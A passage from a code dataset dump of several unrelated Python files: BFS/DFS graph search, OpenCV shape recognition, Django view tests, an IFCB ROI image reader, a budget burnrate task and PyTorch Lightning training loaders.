prev_nodes:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tprev_nodes[neighbor] = node\n\n\t\t\t\t\tqueue.append(neighbor)\n\n\t\t\t\t\t#if the end is found, return the list\n\t\t\t\t\tif neighbor == end:\n\t\t\t\t\t\tprint(\"prev node path: \" , prev_nodes)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmapping.append(neighbor)\n\n\t\t\t\t\t\twhile prev_nodes[end] != start:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tmapping.append(prev_nodes[end])\n\t\t\t\t\t\t\tend = prev_nodes[end]\n\n\t\t\t\t\t\tmapping.append(start)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmapping.reverse()\n\n\t\t\t\t\t\treturn (mapping)\n\t\t#backtrack if a dead-end is hit\n\t\t# if neighbor not in prev_nodes:\n\t\t\t# del mapping[-1]\n\n\ndef DFS(graph, start, end):\n\tfrom collections import deque\n\tprint(\"----------DFS---------\\n\")\n\n\tstack = deque([start])\n\tprev_nodes = {}\n\n\tmapping = []\n\t\n\twhile stack:\n\n\t\tnode = stack.pop()\n\n\t\tif node in graph:\n\n\t\t\tfor neighbor in graph:\n\n\t\t\t\t#if explored, ignore it\n\t\t\t\tif neighbor in graph[node]:\n\n\t\t\t\t\tprev_nodes[neighbor] = [node]\n\t\t\t\t\tstack.append(neighbor)\n\t\t\t\t\t\n\t\t\t\t\tprev_nodes[neighbor] = node\n\n\t\t\t\t\t#if the end is found, return the list\n\t\t\t\t\tif neighbor == end:\n\t\t\t\t\t\tmapping.append(neighbor)\n\n\t\t\t\t\t\twhile prev_nodes[end] != start:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tmapping.append(prev_nodes[end])\n\t\t\t\t\t\t\tend = prev_nodes[end]\n\n\t\t\t\t\t\tmapping.append(start)\n\t\t\t\t\t\t\n\t\t\t\t\t\tmapping.reverse()\n\n\t\t\t\t\t\treturn (mapping)\n\t\t#backtrack if a dead-end is hit\n\n\treturn []\n\ndef main(args):\n\timport sys\n\n\ttry:\n\t\ti_file = open(sys.argv[1], 'r')\n\texcept:\n\t\tprint('input_error %s')\n\t\tsys.exit(2)\n\n\tgraph = makeGraph(i_file)\n\tmapping = []\n#delet this \n\n\tgraph= {1:{2: 10, 3: 5},\n\t 2: {4: 10},\n\t 3: {4: 5},\n\t 4: {5: 5, 6: 10},\n\t 5: {7: 5},\n\t 6: {7: 10},\n\t 7: {}}\n\t# graph = {1:{2:34},\n\t# \t\t\t2:{3:192},\n\t# \t\t\t3:{4:43},\n\t# \t\t\t4:{5:137}}\n\n\t# graph = [dict([a, int(x)] for a, x in b.items()) for b in graph]\n\t# for b in graph:\n\t\t# print(type(b))\n\t# print(\"type: \", sys.argv[4])\n\n\tif sys.argv[2] == sys.argv[3]:\n\t\tprint(\"Start == End, terminate\")\n\t\treturn\n\n\tif sys.argv[4] == \"BFS\":\n\t\tmapping = BFS(graph, int(sys.argv[2]), int(sys.argv[3]) )\n\n\telif sys.argv[4] == \"DFS\":\n\t\tmapping = DFS(graph, int(sys.argv[2]), int(sys.argv[3]) )\n\n\tprint('\\n -----OUTPUT------\\n' ,mapping)\n\n\nif __name__ == '__main__':\n import sys\n main(sys.argv[1:])\n\n", "sub_path": "Search.py", "file_name": "Search.py", "file_ext": "py", "file_size_in_byte": 3325, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.DataFrame", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 79, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 122, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 125, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 153, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 156, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 163, "usage_type": "attribute"}]} +{"seq_id": "31561413", "text": "import cv2\nimport sys\nimport json\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nshape='n/aaaa'\nimgPath=\"C:\\\\xampp\\\\htdocs\\\\projektmunka\\\\python\\\\haromszog.png\"\n#imgPath=sys.argv[1]\nimg = cv2.imread(imgPath, cv2.IMREAD_GRAYSCALE)\n_, threshold = cv2.threshold(img, 240, 255, cv2.THRESH_BINARY)\ncontours, _ = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\nfor cnt in contours:\n approx = cv2.approxPolyDP(cnt, 0.01*cv2.arcLength(cnt, True), True)\n cv2.drawContours(img, [approx], 0, (0), 5)\n x = approx.ravel()[0]\n y = approx.ravel()[1]\n if len(approx) == 3:\n shape=\"triangle\"\n elif len(approx) == 4:\n shape=\"square\"\n elif len(approx) == 5:\n shape=\"otszog\"\n elif 6 < len(approx) < 15:\n shape=\"sokszog\"\n else:\n shape=\"circle\"\nprint(shape)\n", "sub_path": "python/shapeRecognition.py", "file_name": "shapeRecognition.py", "file_ext": "py", "file_size_in_byte": 828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.approxPolyDP", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.arcLength", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "17174717", "text": "from django.test import TestCase\nfrom django.urls import reverse\nfrom .models import Category, Products, Product_saved\nfrom django.contrib.auth.models import User\nfrom django.test import LiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport selenium.webdriver.support.ui as ui\nfrom selenium.webdriver import FirefoxOptions\n\n\n# Create your tests here.\n\ntestproduct = \"\"\ntestproduct2 = \"\"\n\n\ndef setting_up_db():\n testcategory = Category.objects.create(name=\"testcategory\")\n testproduct = Products.objects.create(name=\"testproduct\",\n nutriscore=4,\n image_url=\"/\",\n url_offacts=\"/\",\n energy_value=24.2,\n energy_unit=\"kcal\",\n sugars_100g=12.1,\n fat_100g=2,\n saturated_fat_100g=1.2,\n proteins=4,\n nutriscore_complete_url=\"myapp/assets\\\n /img/nutriscore/nutricomplet_e.png\",\n nutriscore_letter_url=\"myapp/assets\\\n /img/nutriscore/nutrilettre_e.png\")\n testproduct2 = Products.objects.create(name=\"testproduct2\",\n nutriscore=3,\n image_url=\"/\",\n url_offacts=\"/\",\n energy_value=24.2,\n energy_unit=\"kcal\",\n sugars_100g=12.1,\n fat_100g=2,\n saturated_fat_100g=1.2,\n proteins=4,\n nutriscore_complete_url=\"myapp\\\n /assets/img/nutriscore\\\n /nutricomplet_d.png\",\n nutriscore_letter_url=\"myapp/assets\\\n /img/nutriscore/nutrilettre_d.png\")\n testproduct.categories.add(testcategory)\n testproduct2.categories.add(testcategory)\n User.objects.create(username=\"Bob\",\n email=\"bob@gmail.com\",\n password=\"bobby\")\n\n\n# Index page\nclass IndexPageTestCase(TestCase):\n def test_index_page(self):\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n\n\n# Legal notices\nclass LegalPageTestCase(TestCase):\n def test_legal_page(self):\n response = self.client.get(reverse('legal'))\n self.assertEqual(response.status_code, 200)\n\n\n# Search page\nclass SearchPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_search_page_product_found(self):\n response = self.client.get(reverse('search'), {'query': 'testproduct'})\n self.assertEqual(response.status_code, 200)\n\n def test_search_page_product_not_found(self):\n response = self.client.get(reverse('search'), {'query': 'huhuhuhu'})\n self.assertEqual(response.status_code, 404)\n\n\n# Result page\nclass ResultPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_result_page_product_found(self):\n myproduct = Products.objects.get(name=\"testproduct\")\n product_id = myproduct.id\n response = self.client.get(reverse('results', args=(product_id,)))\n self.assertEqual(response.status_code, 200)\n\n\n# Product detail\nclass DetailPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_detail_page_product_found(self):\n myproduct = Products.objects.get(name=\"testproduct\")\n product_id = myproduct.id\n response = self.client.get(reverse('product_detail',\n args=(product_id,)))\n self.assertEqual(response.status_code, 200)\n\n\n# Save and delete a product\nclass SaveProductPageTestCase(TestCase):\n def setUp(self): # create data before tests start\n setting_up_db()\n\n def test_saveanddelete_product_page(self):\n self.client.force_login(user=User.objects.get(username='Bob'))\n saved_products = Product_saved.objects.all()\n products_number_before = len(saved_products)\n prod_to_save_selected = Products.objects.get(name=\"testproduct\")\n prod_to_save_sel_id = Products.objects.get(name=\"testproduct\").id\n prod_to_save_subst = Products.objects.get(name=\"testproduct2\")\n prod_save_subst_id = Products.objects.get(name=\"testproduct2\").id\n # Saving new product\n res = (self.client\n .get(reverse('save_product',\n kwargs={'product_selected_id': prod_to_save_sel_id,\n 'substitution_id': prod_save_subst_id})))\n self.assertEqual(res.status_code, 302)\n\n saved_products_after = Product_saved.objects.all()\n products_number_after = len(saved_products_after)\n self.assertEqual(products_number_after, (products_number_before + 1))\n\n # Deleting new product\n new_product_saved = (Product_saved.objects\n .get(product_selected=prod_to_save_selected,\n substitution_product=prod_to_save_subst,\n user=User.objects.get(username='Bob')))\n response2 = self.client.get(reverse('delete_product',\n args=(new_product_saved.id,)))\n self.assertEqual(response2.status_code, 302)\n products_number_finally = len(Product_saved.objects.all())\n self.assertEqual(products_number_finally, products_number_before)\n\n\n# ------------------- Selenium tests ------------------------#\n\"\"\"\nclass PlayerFormTest(LiveServerTestCase):\n\n def setUp(self):\n \n #Setting up selenium server\n \n opts = FirefoxOptions()\n opts.add_argument(\"--headless\")\n self.driver = webdriver.Firefox(firefox_options=opts)\n self.driver.get(\"http://89.107.63.240\")\n self.wait = ui.WebDriverWait(self.driver, 3000)\n\n def tearDown(self):\n \n #Closing the server\n \n self.driver.quit()\n\n def test_search_page(self):\n # find the elements you need to submit form\n search_test = \"nutella\"\n form = self.driver.find_element_by_id('searchForm')\n form.send_keys(search_test)\n form.send_keys(Keys.ENTER)\n self.driver.implicitly_wait(100)\n ui.WebDriverWait(self.driver, 3000)\n\n # testing search : nutella\n product_searched = (self.driver\n .find_element_by_id('product_searched').text)\n self.assertEqual(product_searched, \"Produit recherché : nutella\")\n url = self.driver.current_url\n self.assertEqual(url, \"http://89.107.63.240/myapp/search/?query=nutella\")\n\n # selecting the first product\n self.driver.find_element_by_partial_link_text(\"Nutella\").click()\n url = self.driver.current_url\n self.assertEqual(url, \"http://89.107.63.240/myapp/23/\")\n\n # see first product detail\n self.driver.find_element_by_partial_link_text(\"Pâte\").click()\n url = self.driver.current_url\n self.assertEqual(url, \"http://89.107.63.240/myapp/product_detail/35/\")\n\"\"\"\n", "sub_path": "myapp/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 7787, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "models.Category.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Products.objects.create", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 20, "usage_type": "name"}, {"api_name": "models.Products.objects.create", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 34, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 51, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 57, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 59, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 66, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 71, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 76, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 80, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 85, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 90, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 92, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 97, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 102, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 110, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 115, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 115, "usage_type": "name"}, {"api_name": "models.Product_saved.objects.all", "line_number": 116, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 118, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 118, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 119, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 120, "usage_type": "name"}, {"api_name": "models.Products.objects.get", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Products.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Products", "line_number": 121, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Product_saved.objects.all", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 129, "usage_type": "name"}, {"api_name": "models.Product_saved.objects.get", "line_number": 134, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 134, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 137, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Product_saved.objects.all", "line_number": 141, "usage_type": "call"}, {"api_name": "models.Product_saved.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "models.Product_saved", "line_number": 141, "usage_type": "name"}]} +{"seq_id": "326511907", "text": "import numpy as np\n\nfrom PIL import Image\nfrom oii.iopipes import PartSource\nfrom oii.ifcb.formats.adc import BYTE_OFFSET, WIDTH, HEIGHT\nfrom array import array\nfrom StringIO import StringIO\n\nROI='roi'\n\ndef as_pil(array_or_image):\n try:\n return Image.fromarray(array_or_image)\n except:\n return array_or_image\n\ndef read_roi(source, target):\n \"\"\"target should be a dictionary containing BYTE_OFFSET, WIDTH, and HEIGHT,\n i.e., the output of read_adc,\n source is any openable stream or Source\"\"\"\n offset = target[BYTE_OFFSET]\n w = target[WIDTH]\n h = target[HEIGHT]\n size = w * h\n if size == 0:\n raise KeyError('no ROI data for target')\n else:\n with PartSource(source,offset,size) as part:\n pixel_data = part.getvalue()\n return np.fromstring(pixel_data,np.uint8).reshape((w,h)) # rotate 90 deg\n\ndef read_rois(targets,roi_path=None,roi_file=None):\n \"\"\"roi_path = pathname of ROI file,\n roi_file = already open ROI file\"\"\"\n if roi_file is None:\n fp = open(roi_path,'rb')\n else:\n fp = roi_file\n for target in sorted(targets, key=lambda t: t[BYTE_OFFSET]):\n w = target[WIDTH]\n h = target[HEIGHT]\n size = w * h\n if size == 0:\n yield None\n else:\n fp.seek(target[BYTE_OFFSET])\n pixel_data = StringIO(fp.read(size)).getvalue()\n yield np.fromstring(pixel_data,np.uint8).reshape((w,h)) # rotate 90 deg\n if roi_path is not None:\n fp.close()\n", "sub_path": "ifcb/formats/roi.py", "file_name": "roi.py", "file_ext": "py", "file_size_in_byte": 1526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PIL.Image.fromarray", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 13, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.BYTE_OFFSET", "line_number": 21, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.WIDTH", "line_number": 22, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.HEIGHT", "line_number": 23, "usage_type": "name"}, {"api_name": "oii.iopipes.PartSource", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 30, "usage_type": "attribute"}, {"api_name": "oii.ifcb.formats.adc.BYTE_OFFSET", "line_number": 39, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.WIDTH", "line_number": 40, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.HEIGHT", "line_number": 41, "usage_type": "name"}, {"api_name": "oii.ifcb.formats.adc.BYTE_OFFSET", "line_number": 46, "usage_type": "name"}, {"api_name": "StringIO.StringIO", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 48, "usage_type": "attribute"}]} +{"seq_id": "37179922", "text": "# -*- coding: utf-8 -*-\nfrom base_task import Task\nfrom datetime import date\nfrom dateutil.relativedelta import relativedelta\nimport json\nfrom lib.ah_requests import AhRequest\nfrom lib.mongodb import Mongo\nfrom logger import Logger\nimport helper_functions as helpers\n\nLOG = Logger()\n\nclass Burnrate(Task):\n def __init__(self, remote_url=None, **args):\n Task.__init__(self,name=self.__class__.__name__, remote_url=remote_url, args=args)\n self.loading_msg = 'Calculating your burnrate'\n self._requires = ['PaymentsComing','PaymentsResult']\n self.conn = Mongo()\n self.mdb = self.conn.db\n \n def run(self):\n self.start()\n try:\n completed_payments = self.input['PaymentsResult']\n comming_payments = self.input['PaymentsComing']\n \n today = helpers.strToDate(helpers.today())\n\n budget_current_year = 0\n\n # sum Completed payments current year\n completed_payments = completed_payments['transactions'][0]['payments']\n completed_payments_this_year = []\n for p in completed_payments:\n payment_date = helpers.strToDate(p['date'])\n if payment_date.year == today.year:\n budget_current_year = budget_current_year + p['amount']\n p['new_budget'] = p['amount'] + p['abs_diff']\n completed_payments_this_year.append(p)\n\n # sum Comming payments current year\n comming_payments = comming_payments['transactions'][0]['payments']\n comming_payments_this_year = []\n for p in comming_payments:\n payment_date = helpers.strToDate(p['date'])\n if payment_date.year == today.year:\n budget_current_year = budget_current_year + p['amount']\n p['new_budget'] = helpers.pct_change(p['amount'], p['pct_diff_since_start']) + p['amount']\n comming_payments_this_year.append(p)\n\n result_so_far = helpers.sum_by_key(completed_payments_this_year,'new_budget')\n result_comming = helpers.sum_by_key(comming_payments_this_year,'new_budget')\n \n burnrate_abs = (result_so_far+result_comming)-budget_current_year\n burnrate_pct = helpers.pct_part_number(burnrate_abs,budget_current_year)\n \n self.output = dict(burnrate_abs=burnrate_abs, burnrate_pct=burnrate_pct)\n except Exception as e:\n self.status = 'Failed'\n self.exception = str(e)\n pass\n self.conn.close()\n self.stop()\n \n def __repr__(self):\n return str(self.name)\n", "sub_path": "workers/tasks/task__burnrate.py", "file_name": "task__burnrate.py", "file_ext": "py", "file_size_in_byte": 2694, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logger.Logger", "line_number": 11, "usage_type": "call"}, {"api_name": "base_task.Task", "line_number": 13, "usage_type": "name"}, {"api_name": "base_task.Task.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "base_task.Task", "line_number": 15, "usage_type": "name"}, {"api_name": "lib.mongodb.Mongo", "line_number": 18, "usage_type": "call"}, {"api_name": "helper_functions.strToDate", "line_number": 27, "usage_type": "call"}, {"api_name": "helper_functions.today", "line_number": 27, "usage_type": "call"}, {"api_name": "helper_functions.strToDate", "line_number": 35, "usage_type": "call"}, {"api_name": "helper_functions.strToDate", "line_number": 45, "usage_type": "call"}, {"api_name": "helper_functions.pct_change", "line_number": 48, "usage_type": "call"}, {"api_name": "helper_functions.sum_by_key", "line_number": 51, "usage_type": "call"}, {"api_name": "helper_functions.sum_by_key", "line_number": 52, "usage_type": "call"}, {"api_name": "helper_functions.pct_part_number", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "382707124", "text": "import os\nimport argparse\n\nimport wandb\nimport pytorch_lightning as pl\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import ModelCheckpoint, LearningRateMonitor\n\nimport lwclr.models as models\nfrom .datamodules import CIFAR10DM, CIFAR100DM, ImageNetDM, DanbooruFacesFullDM\n\ndef ret_args(ret_parser=False):\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--mode', type=str, \n choices=['simclr', 'lwclr_full_mult', 'lwclr_full_single', \n 'lwclr_cont_mult', 'lwclr_cont_single', 'linear_eval', 'fine_tuning'],\n default='simlwclr', help='Framework for training and evaluation')\n\n parser.add_argument('--seed', type=int, default=0, help='random seed for initialization')\n parser.add_argument('--no_cpu_workers', type=int, default=4, help='CPU workers for data loading.')\n\n parser.add_argument('--results_dir', default='results_training', type=str,\n help='The directory where results will be stored')\n parser.add_argument('--save_checkpoint_freq', default=100, type=int,\n help='Frequency (in epochs) to save checkpoints')\n\n parser.add_argument('--dataset_name', \n choices=['cifar10', 'cifar100', 'imagenet', 'danboorufaces', 'danboorufull'], \n default='cifar10', help='Which dataset to use.')\n parser.add_argument('--dataset_path', help='Path for the dataset.')\n parser.add_argument(\"--deit_recipe\", action='store_true',\n help=\"Use DeiT training recipe\")\n \n parser.add_argument('--image_size', default=224, type=int,\n help='Image (square) resolution size')\n parser.add_argument('--batch_size', default=64, type=int,\n help='Batch size for train/val/test.')\n \n parser = models.LitSimCLR.add_model_specific_args(parser)\n \n parser = pl.Trainer.add_argparse_args(parser)\n parser.set_defaults(gpus=1, max_epochs=2, gradient_clip_val=1.0)\n parser.set_defaults(precision=16, log_gpu_memory=None, profiler=None, benchmark=True)\n\n if ret_parser:\n return parser\n args = parser.parse_args()\n\n args.run_name = '{}_layers{}_{}_{}_is{}_bs{}_{}lr{}wd{}_seed{}'.format(\n args.mode, args.cont_layers_range, args.dataset_name, args.model_name, args.image_size, args.batch_size, \n args.optimizer, args.learning_rate, args.weight_decay, args.seed)\n\n if args.deit_recipe:\n ''' taken from DeiT paper\n https://arxiv.org/abs/2012.12877\n https://github.com/facebookresearch/deit/blob/main/main.py'''\n # augmentation and random erase params\n args.color_jitter = 0.4\n args.aa = 'rand-m9-mstd0.5-inc1'\n args.smoothing = 0.1\n args.train_interpolation = 'bicubic'\n args.repeated_aug = True\n args.reprob = 0.25\n args.remode = 'pixel'\n args.recount = 1\n args.resplit = False\n # mixup params\n args.mixup = 0.8\n args.cutmix = 1.0\n args.cutmix_minmax = None\n args.mixup_prob = 1.0\n args.mixup_switch_prob = 0.5\n args.mixup_mode = 'batch'\n\n return args\n\ndef load_trainer(args, model, wandb_logger):\n # https://lightning-bolts.readthedocs.io/en/latest/self_supervised_callbacks.html\n # https://github.com/PyTorchLightning/lightning-bolts/blob/47eb2aae677350159c9ec0dc8ccdb6eef4217fff/pl_bolts/callbacks/ssl_online.py#L66\n checkpoint_callback = ModelCheckpoint(\n dirpath=os.path.join(args.results_dir, args.run_name), \n filename='{epoch}', monitor='val_loss', save_on_train_epoch_end=False, \n verbose=True, save_top_k=-1, save_last=True, save_weights_only=True,\n mode='min', every_n_epochs=args.save_checkpoint_freq)\n\n lr_monitor = LearningRateMonitor(logging_interval='step')\n\n if args.mode not in ['linear_eval', 'fine_tuning']:\n online_eval_callback = models.SSLOnlineLinearEvaluator(\n mode=args.mode, z_dim=model.backbone.configuration.hidden_size, \n num_classes=args.num_classes, lr=args.learning_rate)\n trainer = pl.Trainer.from_argparse_args(args, callbacks=[checkpoint_callback, lr_monitor, online_eval_callback])\n else:\n trainer = pl.Trainer.from_argparse_args(args, callbacks=[checkpoint_callback, lr_monitor])\n trainer.logger = wandb_logger\n \n return trainer\n\n\ndef load_plmodel(args):\n if args.mode == 'simclr':\n model = models.LitSimCLR(args)\n elif args.mode in ['lwclr_full_mult', 'lwclr_full_single']:\n model = models.LitLWCLRFull(args)\n elif args.mode in ['lwclr_cont_mult', 'lwclr_cont_single']:\n model = models.LitLWCLRCont(args)\n elif args.mode == 'linear_eval' or args.mode == 'fine_tuning':\n model = models.LitEvaluator(args)\n return model\n\n\ndef return_prepared_dm(args):\n\n # setup data\n if args.dataset_name == 'cifar10':\n dm = CIFAR10DM(args)\n elif args.dataset_name == 'cifar100':\n dm = CIFAR100DM(args)\n elif args.dataset_name == 'imagenet':\n assert args.dataset_path, \"Dataset path must not be empty.\"\n dm = ImageNetDM(args)\n elif args.dataset_name == 'danboorufaces' or 'danboorufull':\n assert args.dataset_path, \"Dataset path must not be empty.\"\n dm = DanbooruFacesFullDM(args)\n \n dm.prepare_data()\n dm.setup('fit')\n args.num_classes = dm.num_classes\n\n if args.max_steps:\n total_steps = args.max_steps\n else:\n total_steps = args.max_epochs * len(dm.train_dataloader())\n args.total_steps = total_steps\n\n if args.warmup_epochs:\n args.warmup_steps = args.max_epochs * len(dm.train_dataloader())\n \n return dm\n\n\ndef environment_loader(args, init=True):\n \n # set up W&B logger\n if init:\n os.makedirs(args.results_dir, exist_ok=True)\n wandb.init(config=args)\n wandb.run.name = args.run_name\n wandb_logger = WandbLogger(name=args.run_name)\n \n # seed everything\n pl.seed_everything(seed=args.seed)\n\n # prepare datamodule\n dm = return_prepared_dm(args)\n\n # setup model and trainer\n model = load_plmodel(args)\n trainer = load_trainer(args, model, wandb_logger)\n \n return dm, trainer, model\n", "sub_path": "lwclr/utilities/loaders.py", "file_name": "loaders.py", "file_ext": "py", "file_size_in_byte": 6297, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "lwclr.models.LitSimCLR.add_model_specific_args", "line_number": 41, "usage_type": "call"}, {"api_name": "lwclr.models.LitSimCLR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "lwclr.models", "line_number": 41, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer.add_argparse_args", "line_number": 43, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.LearningRateMonitor", "line_number": 88, "usage_type": "call"}, {"api_name": "lwclr.models.SSLOnlineLinearEvaluator", "line_number": 91, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 91, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 94, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 96, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 96, "usage_type": "attribute"}, {"api_name": "lwclr.models.LitSimCLR", "line_number": 104, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 104, "usage_type": "name"}, {"api_name": "lwclr.models.LitLWCLRFull", "line_number": 106, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 106, "usage_type": "name"}, {"api_name": "lwclr.models.LitLWCLRCont", "line_number": 108, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 108, "usage_type": "name"}, {"api_name": "lwclr.models.LitEvaluator", "line_number": 110, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 110, 